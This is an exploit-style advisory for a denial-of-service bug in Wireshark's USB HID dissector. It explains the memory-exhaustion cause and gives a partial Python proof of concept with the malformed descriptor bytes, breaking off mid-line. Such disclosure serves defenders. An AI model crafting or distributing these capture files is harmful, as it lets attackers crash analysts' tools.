============================================================================================================================================= | # Title : Wireshark 4.6.0 to 4.6.3, 4.4.0 to 4.4.13 USB HID Protocol Dissector Memory Exhaustion | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://www.wireshark.org/ | ============================================================================================================================================= [+] Summary : CVE-2026-3201 is a Denial-of-Service (DoS) vulnerability affecting the USB HID protocol dissector in Wireshark versions: 4.6.0 through 4.6.3 4.4.0 through 4.4.13 The vulnerability is triggered when Wireshark parses a specially crafted USB HID Report Descriptor containing an excessively large USAGE_MAXIMUM value. When such a malformed capture file (e.g., PCAPNG with USBPcap link type 249) is opened, the dissector attempts to allocate memory based on the attacker-controlled value. Due to insufficient bounds checking, this can cause uncontrolled memory growth (e.g., via internal array expansion such as wmem_array_grow()), leading to: Excessive memory consumption Application freeze Application crash [+] Vulnerability Type : Category: Denial of Service (DoS) [+] POC : import struct from scapy.all import * def generate_perfect_exploit(): print("[*] Building Refined Malicious USB HID Payload...") malicious_hid = ( b"\x05\x01" b"\x09\x06" b"\xa1\x01" b"\x19\x00" b"\x2b\x00\x00\x00\x10" b"\xc0" ) header_len = 27 data_len = len(malicious_hid) total_len = header_len + data_len usb_header = struct.pack("